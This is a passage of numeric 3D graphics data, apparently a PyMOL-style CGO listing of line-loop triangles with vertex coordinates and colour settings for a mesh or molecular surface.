VERTEX, 17.678, 27.341, 27.306,
VERTEX, 17.513, 27.523, 27.272,
VERTEX, 18.120, 27.684, 26.939,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.513, 27.523, 27.272,
VERTEX, 18.120, 27.684, 26.939,
VERTEX, 17.951, 27.861, 26.894,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.120, 27.684, 26.939,
VERTEX, 17.951, 27.861, 26.894,
VERTEX, 18.647, 28.026, 26.269,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.951, 27.861, 26.894,
VERTEX, 18.647, 28.026, 26.269,
VERTEX, 18.469, 28.194, 26.213,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.647, 28.026, 26.269,
VERTEX, 18.469, 28.194, 26.213,
VERTEX, 18.950, 28.167, 25.688,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.469, 28.194, 26.213,
VERTEX, 18.950, 28.167, 25.688,
VERTEX, 18.764, 28.326, 25.627,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.950, 28.167, 25.688,
VERTEX, 18.764, 28.326, 25.627,
VERTEX, 18.852, 28.024, 25.538,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.764, 28.326, 25.627,
VERTEX, 18.852, 28.024, 25.538,
VERTEX, 18.664, 28.181, 25.480,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.852, 28.024, 25.538,
VERTEX, 18.664, 28.181, 25.480,
VERTEX, 18.410, 27.681, 25.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.664, 28.181, 25.480,
VERTEX, 18.410, 27.681, 25.906,
VERTEX, 18.227, 27.843, 25.858,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.410, 27.681, 25.906,
VERTEX, 18.227, 27.843, 25.858,
VERTEX, 17.883, 27.339, 26.576,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.227, 27.843, 25.858,
VERTEX, 17.883, 27.339, 26.576,
VERTEX, 17.709, 27.511, 26.539,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.883, 27.339, 26.576,
VERTEX, 17.709, 27.511, 26.539,
VERTEX, 17.580, 27.198, 27.156,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.709, 27.511, 26.539,
VERTEX, 17.580, 27.198, 27.156,
VERTEX, 17.413, 27.378, 27.125,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.580, 27.198, 27.156,
VERTEX, 17.413, 27.378, 27.125,
VERTEX, 17.678, 27.341, 27.306,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.413, 27.378, 27.125,
VERTEX, 17.678, 27.341, 27.306,
VERTEX, 17.513, 27.523, 27.272,
END,
COLOR, 0.000, 0.792, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 17.513, 27.523, 27.272,
VERTEX, 17.349, 27.700, 27.241,
VERTEX, 17.951, 27.861, 26.894,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.349, 27.700, 27.241,
VERTEX, 17.951, 27.861, 26.894,
VERTEX, 17.779, 28.034, 26.852,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.951, 27.861, 26.894,
VERTEX, 17.779, 28.034, 26.852,
VERTEX, 18.469, 28.194, 26.213,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.779, 28.034, 26.852,
VERTEX, 18.469, 28.194, 26.213,
VERTEX, 18.288, 28.358, 26.159,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.469, 28.194, 26.213,
VERTEX, 18.288, 28.358, 26.159,
VERTEX, 18.764, 28.326, 25.627,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.288, 28.358, 26.159,
VERTEX, 18.764, 28.326, 25.627,
VERTEX, 18.575, 28.482, 25.567,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.764, 28.326, 25.627,
VERTEX, 18.575, 28.482, 25.567,
VERTEX, 18.664, 28.181, 25.480,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.575, 28.482, 25.567,
VERTEX, 18.664, 28.181, 25.480,
VERTEX, 18.474, 28.334, 25.424,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.664, 28.181, 25.480,
VERTEX, 18.474, 28.334, 25.424,
VERTEX, 18.227, 27.843, 25.858,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.474, 28.334, 25.424,
VERTEX, 18.227, 27.843, 25.858,
VERTEX, 18.043, 28.000, 25.813,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.227, 27.843, 25.858,
VERTEX, 18.043, 28.000, 25.813,
VERTEX, 17.709, 27.511, 26.539,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.043, 28.000, 25.813,
VERTEX, 17.709, 27.511, 26.539,
VERTEX, 17.535, 27.677, 26.506,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.709, 27.511, 26.539,
VERTEX, 17.535, 27.677, 26.506,
VERTEX, 17.413, 27.378, 27.125,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.535, 27.677, 26.506,
VERTEX, 17.413, 27.378, 27.125,
VERTEX, 17.247, 27.552, 27.098,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.413, 27.378, 27.125,
VERTEX, 17.247, 27.552, 27.098,
VERTEX, 17.513, 27.523, 27.272,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.247, 27.552, 27.098,
VERTEX, 17.513, 27.523, 27.272,
VERTEX, 17.349, 27.700, 27.241,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.349, 27.700, 27.241,
VERTEX, 17.168, 27.887, 27.212,
VERTEX, 17.779, 28.034, 26.852,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.168, 27.887, 27.212,
VERTEX, 17.779, 28.034, 26.852,
VERTEX, 17.590, 28.216, 26.811,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.779, 28.034, 26.852,
VERTEX, 17.590, 28.216, 26.811,
VERTEX, 18.288, 28.358, 26.159,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.590, 28.216, 26.811,
VERTEX, 18.288, 28.358, 26.159,
VERTEX, 18.086, 28.531, 26.105,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.288, 28.358, 26.159,
VERTEX, 18.086, 28.531, 26.105,
VERTEX, 18.575, 28.482, 25.567,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.086, 28.531, 26.105,
VERTEX, 18.575, 28.482, 25.567,
VERTEX, 18.364, 28.647, 25.507,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.575, 28.482, 25.567,
VERTEX, 18.364, 28.647, 25.507,
VERTEX, 18.474, 28.334, 25.424,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.364, 28.647, 25.507,
VERTEX, 18.474, 28.334, 25.424,
VERTEX, 18.261, 28.495, 25.368,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.474, 28.334, 25.424,
VERTEX, 18.261, 28.495, 25.368,
VERTEX, 18.043, 28.000, 25.813,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.261, 28.495, 25.368,
VERTEX, 18.043, 28.000, 25.813,
VERTEX, 17.839, 28.166, 25.769,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.043, 28.000, 25.813,
VERTEX, 17.839, 28.166, 25.769,
VERTEX, 17.535, 27.677, 26.506,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.839, 28.166, 25.769,
VERTEX, 17.535, 27.677, 26.506,
VERTEX, 17.344, 27.851, 26.475,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.535, 27.677, 26.506,
VERTEX, 17.344, 27.851, 26.475,
VERTEX, 17.247, 27.552, 27.098,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.344, 27.851, 26.475,
VERTEX, 17.247, 27.552, 27.098,
VERTEX, 17.066, 27.735, 27.073,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.247, 27.552, 27.098,
VERTEX, 17.066, 27.735, 27.073,
VERTEX, 17.349, 27.700, 27.241,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.066, 27.735, 27.073,
VERTEX, 17.349, 27.700, 27.241,
VERTEX, 17.168, 27.887, 27.212,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.168, 27.887, 27.212,
VERTEX, 16.955, 28.096, 27.185,
VERTEX, 17.590, 28.216, 26.811,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.955, 28.096, 27.185,
VERTEX, 17.590, 28.216, 26.811,
VERTEX, 17.366, 28.422, 26.769,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.590, 28.216, 26.811,
VERTEX, 17.366, 28.422, 26.769,
VERTEX, 18.086, 28.531, 26.105,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.366, 28.422, 26.769,
VERTEX, 18.086, 28.531, 26.105,
VERTEX, 17.845, 28.727, 26.047,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.086, 28.531, 26.105,
VERTEX, 17.845, 28.727, 26.047,
VERTEX, 18.364, 28.647, 25.507,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.845, 28.727, 26.047,
VERTEX, 18.364, 28.647, 25.507,
VERTEX, 18.110, 28.832, 25.441,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.364, 28.647, 25.507,
VERTEX, 18.110, 28.832, 25.441,
VERTEX, 18.261, 28.495, 25.368,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.110, 28.832, 25.441,
VERTEX, 18.261, 28.495, 25.368,
VERTEX, 18.006, 28.677, 25.307,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.261, 28.495, 25.368,
VERTEX, 18.006, 28.677, 25.307,
VERTEX, 17.839, 28.166, 25.769,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.006, 28.677, 25.307,
VERTEX, 17.839, 28.166, 25.769,
VERTEX, 17.595, 28.352, 25.723,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.839, 28.166, 25.769,
VERTEX, 17.595, 28.352, 25.723,
VERTEX, 17.344, 27.851, 26.475,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.595, 28.352, 25.723,
VERTEX, 17.344, 27.851, 26.475,
VERTEX, 17.117, 28.047, 26.446,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.344, 27.851, 26.475,
VERTEX, 17.117, 28.047, 26.446,
VERTEX, 17.066, 27.735, 27.073,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.117, 28.047, 26.446,
VERTEX, 17.066, 27.735, 27.073,
VERTEX, 16.852, 27.941, 27.051,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.066, 27.735, 27.073,
VERTEX, 16.852, 27.941, 27.051,
VERTEX, 17.168, 27.887, 27.212,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.852, 27.941, 27.051,
VERTEX, 17.168, 27.887, 27.212,
VERTEX, 16.955, 28.096, 27.185,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.955, 28.096, 27.185,
VERTEX, 16.695, 28.344, 27.158,
VERTEX, 17.366, 28.422, 26.769,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.695, 28.344, 27.158,
VERTEX, 17.366, 28.422, 26.769,
VERTEX, 17.091, 28.664, 26.723,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.366, 28.422, 26.769,
VERTEX, 17.091, 28.664, 26.723,
VERTEX, 17.845, 28.727, 26.047,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.091, 28.664, 26.723,
VERTEX, 17.845, 28.727, 26.047,
VERTEX, 17.546, 28.957, 25.981,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.845, 28.727, 26.047,
VERTEX, 17.546, 28.957, 25.981,
VERTEX, 18.110, 28.832, 25.441,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.546, 28.957, 25.981,
VERTEX, 18.110, 28.832, 25.441,
VERTEX, 17.794, 29.051, 25.367,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.110, 28.832, 25.441,
VERTEX, 17.794, 29.051, 25.367,
VERTEX, 18.006, 28.677, 25.307,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.794, 29.051, 25.367,
VERTEX, 18.006, 28.677, 25.307,
VERTEX, 17.689, 28.892, 25.239,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.006, 28.677, 25.307,
VERTEX, 17.689, 28.892, 25.239,
VERTEX, 17.595, 28.352, 25.723,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.689, 28.892, 25.239,
VERTEX, 17.595, 28.352, 25.723,
VERTEX, 17.292, 28.572, 25.674,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.595, 28.352, 25.723,
VERTEX, 17.292, 28.572, 25.674,
VERTEX, 17.117, 28.047, 26.446,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.292, 28.572, 25.674,
VERTEX, 17.117, 28.047, 26.446,
VERTEX, 16.837, 28.279, 26.416,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.117, 28.047, 26.446,
VERTEX, 16.837, 28.279, 26.416,
VERTEX, 16.852, 27.941, 27.051,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.837, 28.279, 26.416,
VERTEX, 16.852, 27.941, 27.051,
VERTEX, 16.590, 28.184, 27.030,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.852, 27.941, 27.051,
VERTEX, 16.590, 28.184, 27.030,
VERTEX, 16.955, 28.096, 27.185,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.590, 28.184, 27.030,
VERTEX, 16.955, 28.096, 27.185,
VERTEX, 16.695, 28.344, 27.158,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.695, 28.344, 27.158,
VERTEX, 16.372, 28.643, 27.129,
VERTEX, 17.091, 28.664, 26.723,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.372, 28.643, 27.129,
VERTEX, 17.091, 28.664, 26.723,
VERTEX, 16.749, 28.956, 26.672,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.091, 28.664, 26.723,
VERTEX, 16.749, 28.956, 26.672,
VERTEX, 17.546, 28.957, 25.981,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.749, 28.956, 26.672,
VERTEX, 17.546, 28.957, 25.981,
VERTEX, 17.173, 29.234, 25.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.546, 28.957, 25.981,
VERTEX, 17.173, 29.234, 25.906,
VERTEX, 17.794, 29.051, 25.367,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.173, 29.234, 25.906,
VERTEX, 17.794, 29.051, 25.367,
VERTEX, 17.396, 29.315, 25.280,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.794, 29.051, 25.367,
VERTEX, 17.396, 29.315, 25.280,
VERTEX, 17.689, 28.892, 25.239,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.396, 29.315, 25.280,
VERTEX, 17.689, 28.892, 25.239,
VERTEX, 17.288, 29.151, 25.161,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.689, 28.892, 25.239,
VERTEX, 17.288, 29.151, 25.161,
VERTEX, 17.292, 28.572, 25.674,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.288, 29.151, 25.161,
VERTEX, 17.292, 28.572, 25.674,
VERTEX, 16.911, 28.839, 25.618,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.292, 28.572, 25.674,
VERTEX, 16.911, 28.839, 25.618,
VERTEX, 16.837, 28.279, 26.416,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.911, 28.839, 25.618,
VERTEX, 16.837, 28.279, 26.416,
VERTEX, 16.487, 28.561, 26.384,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.837, 28.279, 26.416,
VERTEX, 16.487, 28.561, 26.384,
VERTEX, 16.590, 28.184, 27.030,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.487, 28.561, 26.384,
VERTEX, 16.590, 28.184, 27.030,
VERTEX, 16.264, 28.480, 27.010,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.590, 28.184, 27.030,
VERTEX, 16.264, 28.480, 27.010,
VERTEX, 16.695, 28.344, 27.158,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.264, 28.480, 27.010,
VERTEX, 16.695, 28.344, 27.158,
VERTEX, 16.372, 28.643, 27.129,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.372, 28.643, 27.129,
VERTEX, 16.053, 28.941, 27.101,
VERTEX, 16.749, 28.956, 26.672,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.053, 28.941, 27.101,
VERTEX, 16.749, 28.956, 26.672,
VERTEX, 16.408, 29.244, 26.621,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.749, 28.956, 26.672,
VERTEX, 16.408, 29.244, 26.621,
VERTEX, 17.173, 29.234, 25.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.408, 29.244, 26.621,
VERTEX, 17.173, 29.234, 25.906,
VERTEX, 16.799, 29.506, 25.832,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.173, 29.234, 25.906,
VERTEX, 16.799, 29.506, 25.832,
VERTEX, 17.396, 29.315, 25.280,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.799, 29.506, 25.832,
VERTEX, 17.396, 29.315, 25.280,
VERTEX, 16.996, 29.573, 25.196,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.396, 29.315, 25.280,
VERTEX, 16.996, 29.573, 25.196,
VERTEX, 17.288, 29.151, 25.161,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.996, 29.573, 25.196,
VERTEX, 17.288, 29.151, 25.161,
VERTEX, 16.884, 29.406, 25.085,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.288, 29.151, 25.161,
VERTEX, 16.884, 29.406, 25.085,
VERTEX, 16.911, 28.839, 25.618,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.884, 29.406, 25.085,
VERTEX, 16.911, 28.839, 25.618,
VERTEX, 16.528, 29.103, 25.565,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.911, 28.839, 25.618,
VERTEX, 16.528, 29.103, 25.565,
VERTEX, 16.487, 28.561, 26.384,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.528, 29.103, 25.565,
VERTEX, 16.487, 28.561, 26.384,
VERTEX, 16.138, 28.841, 26.354,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.487, 28.561, 26.384,
VERTEX, 16.138, 28.841, 26.354,
VERTEX, 16.264, 28.480, 27.010,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.138, 28.841, 26.354,
VERTEX, 16.264, 28.480, 27.010,
VERTEX, 15.941, 28.774, 26.990,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.264, 28.480, 27.010,
VERTEX, 15.941, 28.774, 26.990,
VERTEX, 16.372, 28.643, 27.129,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.941, 28.774, 26.990,
VERTEX, 16.372, 28.643, 27.129,
VERTEX, 16.053, 28.941, 27.101,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.053, 28.941, 27.101,
VERTEX, 15.801, 29.181, 27.079,
VERTEX, 16.408, 29.244, 26.621,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.801, 29.181, 27.079,
VERTEX, 16.408, 29.244, 26.621,
VERTEX, 16.138, 29.476, 26.581,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.408, 29.244, 26.621,
VERTEX, 16.138, 29.476, 26.581,
VERTEX, 16.799, 29.506, 25.832,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.138, 29.476, 26.581,
VERTEX, 16.799, 29.506, 25.832,
VERTEX, 16.499, 29.723, 25.774,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.799, 29.506, 25.832,
VERTEX, 16.499, 29.723, 25.774,
VERTEX, 16.996, 29.573, 25.196,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.499, 29.723, 25.774,
VERTEX, 16.996, 29.573, 25.196,
VERTEX, 16.674, 29.777, 25.130,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.996, 29.573, 25.196,
VERTEX, 16.674, 29.777, 25.130,
VERTEX, 16.884, 29.406, 25.085,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.674, 29.777, 25.130,
VERTEX, 16.884, 29.406, 25.085,
VERTEX, 16.559, 29.607, 25.026,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.884, 29.406, 25.085,
VERTEX, 16.559, 29.607, 25.026,
VERTEX, 16.528, 29.103, 25.565,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.559, 29.607, 25.026,
VERTEX, 16.528, 29.103, 25.565,
VERTEX, 16.222, 29.313, 25.524,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.528, 29.103, 25.565,
VERTEX, 16.222, 29.313, 25.524,
VERTEX, 16.138, 28.841, 26.354,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.222, 29.313, 25.524,
VERTEX, 16.138, 28.841, 26.354,
VERTEX, 15.861, 29.066, 26.332,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.138, 28.841, 26.354,
VERTEX, 15.861, 29.066, 26.332,
VERTEX, 15.941, 28.774, 26.990,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.861, 29.066, 26.332,
VERTEX, 15.941, 28.774, 26.990,
VERTEX, 15.687, 29.011, 26.976,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.941, 28.774, 26.990,
VERTEX, 15.687, 29.011, 26.976,
VERTEX, 16.053, 28.941, 27.101,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.687, 29.011, 26.976,
VERTEX, 16.053, 28.941, 27.101,
VERTEX, 15.801, 29.181, 27.079,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.801, 29.181, 27.079,
VERTEX, 15.599, 29.375, 27.063,
VERTEX, 16.138, 29.476, 26.581,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.599, 29.375, 27.063,
VERTEX, 16.138, 29.476, 26.581,
VERTEX, 15.919, 29.663, 26.550,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.138, 29.476, 26.581,
VERTEX, 15.919, 29.663, 26.550,
VERTEX, 16.499, 29.723, 25.774,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.919, 29.663, 26.550,
VERTEX, 16.499, 29.723, 25.774,
VERTEX, 16.254, 29.896, 25.727,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.499, 29.723, 25.774,
VERTEX, 16.254, 29.896, 25.727,
VERTEX, 16.674, 29.777, 25.130,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.254, 29.896, 25.727,
VERTEX, 16.674, 29.777, 25.130,
VERTEX, 16.409, 29.939, 25.077,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.674, 29.777, 25.130,
VERTEX, 16.409, 29.939, 25.077,
VERTEX, 16.559, 29.607, 25.026,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.409, 29.939, 25.077,
VERTEX, 16.559, 29.607, 25.026,
VERTEX, 16.293, 29.766, 24.981,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.559, 29.607, 25.026,
VERTEX, 16.293, 29.766, 24.981,
VERTEX, 16.222, 29.313, 25.524,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.293, 29.766, 24.981,
VERTEX, 16.222, 29.313, 25.524,
VERTEX, 15.974, 29.478, 25.494,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.222, 29.313, 25.524,
VERTEX, 15.974, 29.478, 25.494,
VERTEX, 15.861, 29.066, 26.332,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.974, 29.478, 25.494,
VERTEX, 15.861, 29.066, 26.332,
VERTEX, 15.638, 29.245, 26.317,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.861, 29.066, 26.332,
VERTEX, 15.638, 29.245, 26.317,
VERTEX, 15.687, 29.011, 26.976,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.638, 29.245, 26.317,
VERTEX, 15.687, 29.011, 26.976,
VERTEX, 15.483, 29.202, 26.967,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.687, 29.011, 26.976,
VERTEX, 15.483, 29.202, 26.967,
VERTEX, 15.801, 29.181, 27.079,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.483, 29.202, 26.967,
VERTEX, 15.801, 29.181, 27.079,
VERTEX, 15.599, 29.375, 27.063,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.599, 29.375, 27.063,
VERTEX, 15.430, 29.536, 27.053,
VERTEX, 15.919, 29.663, 26.550,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.430, 29.536, 27.053,
VERTEX, 15.919, 29.663, 26.550,
VERTEX, 15.731, 29.817, 26.526,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.919, 29.663, 26.550,
VERTEX, 15.731, 29.817, 26.526,
VERTEX, 16.254, 29.896, 25.727,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.731, 29.817, 26.526,
VERTEX, 16.254, 29.896, 25.727,
VERTEX, 16.042, 30.039, 25.690,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.254, 29.896, 25.727,
VERTEX, 16.042, 30.039, 25.690,
VERTEX, 16.409, 29.939, 25.077,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.042, 30.039, 25.690,
VERTEX, 16.409, 29.939, 25.077,
VERTEX, 16.181, 30.070, 25.036,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.409, 29.939, 25.077,
VERTEX, 16.181, 30.070, 25.036,
VERTEX, 16.293, 29.766, 24.981,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.181, 30.070, 25.036,
VERTEX, 16.293, 29.766, 24.981,
VERTEX, 16.066, 29.893, 24.946,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.293, 29.766, 24.981,
VERTEX, 16.066, 29.893, 24.946,
VERTEX, 15.974, 29.478, 25.494,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.066, 29.893, 24.946,
VERTEX, 15.974, 29.478, 25.494,
VERTEX, 15.764, 29.611, 25.473,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.974, 29.478, 25.494,
VERTEX, 15.764, 29.611, 25.473,
VERTEX, 15.638, 29.245, 26.317,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.764, 29.611, 25.473,
VERTEX, 15.638, 29.245, 26.317,
VERTEX, 15.453, 29.390, 26.309,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.638, 29.245, 26.317,
VERTEX, 15.453, 29.390, 26.309,
VERTEX, 15.483, 29.202, 26.967,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.453, 29.390, 26.309,
VERTEX, 15.483, 29.202, 26.967,
VERTEX, 15.315, 29.359, 26.963,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.483, 29.202, 26.967,
VERTEX, 15.315, 29.359, 26.963,
VERTEX, 15.599, 29.375, 27.063,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.315, 29.359, 26.963,
VERTEX, 15.599, 29.375, 27.063,
VERTEX, 15.430, 29.536, 27.053,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.430, 29.536, 27.053,
VERTEX, 15.277, 29.674, 27.048,
VERTEX, 15.731, 29.817, 26.526,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.277, 29.674, 27.048,
VERTEX, 15.731, 29.817, 26.526,
VERTEX, 15.559, 29.952, 26.508,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.731, 29.817, 26.526,
VERTEX, 15.559, 29.952, 26.508,
VERTEX, 16.042, 30.039, 25.690,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.559, 29.952, 26.508,
VERTEX, 16.042, 30.039, 25.690,
VERTEX, 15.846, 30.162, 25.661,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.042, 30.039, 25.690,
VERTEX, 15.846, 30.162, 25.661,
VERTEX, 16.181, 30.070, 25.036,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.846, 30.162, 25.661,
VERTEX, 16.181, 30.070, 25.036,
VERTEX, 15.969, 30.182, 25.004,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.181, 30.070, 25.036,
VERTEX, 15.969, 30.182, 25.004,
VERTEX, 16.066, 29.893, 24.946,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.969, 30.182, 25.004,
VERTEX, 16.066, 29.893, 24.946,
VERTEX, 15.856, 30.000, 24.920,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.066, 29.893, 24.946,
VERTEX, 15.856, 30.000, 24.920,
VERTEX, 15.764, 29.611, 25.473,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.856, 30.000, 24.920,
VERTEX, 15.764, 29.611, 25.473,
VERTEX, 15.574, 29.723, 25.460,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.764, 29.611, 25.473,
VERTEX, 15.574, 29.723, 25.460,
VERTEX, 15.453, 29.390, 26.309,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.574, 29.723, 25.460,
VERTEX, 15.453, 29.390, 26.309,
VERTEX, 15.287, 29.512, 26.307,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.453, 29.390, 26.309,
VERTEX, 15.287, 29.512, 26.307,
VERTEX, 15.315, 29.359, 26.963,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.287, 29.512, 26.307,
VERTEX, 15.315, 29.359, 26.963,
VERTEX, 15.164, 29.492, 26.965,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.315, 29.359, 26.963,
VERTEX, 15.164, 29.492, 26.965,
VERTEX, 15.430, 29.536, 27.053,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.164, 29.492, 26.965,
VERTEX, 15.430, 29.536, 27.053,
VERTEX, 15.277, 29.674, 27.048,
END,
COLOR, 0.000, 0.808, 1.000,
